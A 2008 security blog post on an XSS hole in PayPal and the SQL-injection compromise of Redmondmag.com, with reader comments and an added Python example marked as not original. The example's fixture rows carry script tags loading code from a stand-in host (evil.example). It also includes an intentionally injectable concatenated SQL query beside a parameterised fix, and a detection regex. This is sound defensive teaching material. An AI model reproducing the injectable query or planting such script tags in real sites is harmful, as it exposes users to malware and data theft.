PayPal XSSed, Redmondmag.com SQL Injected
Posted by: Giorgio in XSS, SQL, Mozilla, Security, NoScript
The Register's columns are getting better and better at web-security-related content.
In one single article, Dan Goodin managed to:
- Report an XSS hole in PayPal's “safe” area (the wet dream of all XSS kiddies), enabling all sorts of profitable scams, from credential stealing to automated transactions riding the session of an authenticated user.
- Make a very valid point about extended validation SSL certificates being overrated, if not just an expensive joke, because the green bar is more than happy to “certify” XSS-compromised pages as legitimate (obviously, since the injected script is served from the genuine origin): in other words, the perfect phishing works even better if you’ve got a modern, secure browser supporting EV SSL :)
- Deride McAfee’s Hacker Safe one more time for its ridiculous stance on XSS vulnerabilities — OK, that’s just beating a dead horse…
Just a little addition of mine: despite PayPal’s safe browser nonsense, the browser which can save you from XSS exploitation is only one.
In other news, Redmond - The Independent Voice of the Microsoft IT Community, formerly known as the Microsoft Certified Professional Magazine, joined the party of ASP/MS SQL Server sites that have been SQL injected to serve JavaScript malware.
Considering the wide coverage this epidemic enjoyed in the past week, I wonder what a “Certified Professional” usually reads aside from Microsoft EULAs…
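The ASP/MS SQL Server compromise pattern mentioned above, as an added example that is not part of the original post: a constructed SQLite stand-in for a site's content table, the string-concatenated lookup that makes such a site injectable beside its parameterised replacement, and a defender-side scan for script tags injected into stored text. The `articles` table, its sample rows and the `evil.example` host are constructed for this example and do not come from the Redmond incident.

```python
import re
import sqlite3

# Constructed sample data: a tiny "articles" table standing in for an
# ASP/MS SQL Server site's content store. Two rows carry an injected
# <script src=...> tag, the rest are clean.
SAMPLE_ROWS = [
    (1, "Welcome", "Plain article body."),
    (2, "News", 'Body text<script src="http://evil.example/x.js"></script>'),
    (3, "About", "Nothing to see here."),
    (4, "Contact", 'Call us.</title><script src="http://evil.example/y.js"></script>'),
]

# Matches a script tag that loads code from a URL, which is what the
# mass-injection campaigns left behind in text columns.
INJECTED_SCRIPT_RE = re.compile(r"<script[^>]*\bsrc\s*=", re.IGNORECASE)


def build_db():
    """Create the in-memory sample database and load the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)"
    )
    conn.executemany("INSERT INTO articles VALUES (?, ?, ?)", SAMPLE_ROWS)
    conn.commit()
    return conn


def unsafe_lookup(conn, title):
    """The pattern that got these sites injected: input concatenated into SQL.

    Any quote character in `title` changes the structure of the statement,
    so the database ends up executing whatever the caller supplied.
    """
    sql = "SELECT id FROM articles WHERE title = '" + title + "'"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, title):
    """Parameterised version: the value travels separately from the SQL text,
    so quotes in the input are data, never statement structure."""
    return [
        row[0]
        for row in conn.execute("SELECT id FROM articles WHERE title = ?", (title,))
    ]


def find_injected_scripts(conn):
    """Defender-side check: list (row id, column) pairs whose stored text
    contains an externally sourced script tag."""
    hits = []
    for row_id, title, body in conn.execute("SELECT id, title, body FROM articles"):
        for column, value in (("title", title), ("body", body)):
            if INJECTED_SCRIPT_RE.search(value):
                hits.append((row_id, column))
    return hits


if __name__ == "__main__":
    db = build_db()
    print("safe lookup of 'News':", safe_lookup(db, "News"))
    # A perfectly legitimate title breaks the concatenated query outright,
    # which is the same structural flaw an attacker exploits.
    try:
        unsafe_lookup(db, "O'Reilly")
    except sqlite3.OperationalError as exc:
        print("unsafe lookup of \"O'Reilly\" failed:", exc)
    print("safe lookup of \"O'Reilly\":", safe_lookup(db, "O'Reilly"))
    print("rows carrying injected scripts:", find_injected_scripts(db))
```

The scan is deliberately crude: it flags any `<script src=` in a text column, which is the right trade-off for an incident sweep of a content database where legitimate rows should never contain markup. Rows it reports are candidates for cleanup, and the lookup functions show why the fix belongs in the data-access layer rather than in output filtering alone.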
May 19th, 2008 at 2:21 pm
Uh… that’s pretty, hm, sort of scary. I always thought it was only a matter of time. And it was :P
BTW, is it me or do you always tell people that NoScript is the solution to XSS, security holes, terrorism, cancer, hunger and other stuff? :P
May 19th, 2008 at 2:46 pm
@Rafael:
I’m afraid NoScript is for XSS and other web security holes only.
For terrorism, cancer, hunger and other stuff, you need to install NoCapitalism :)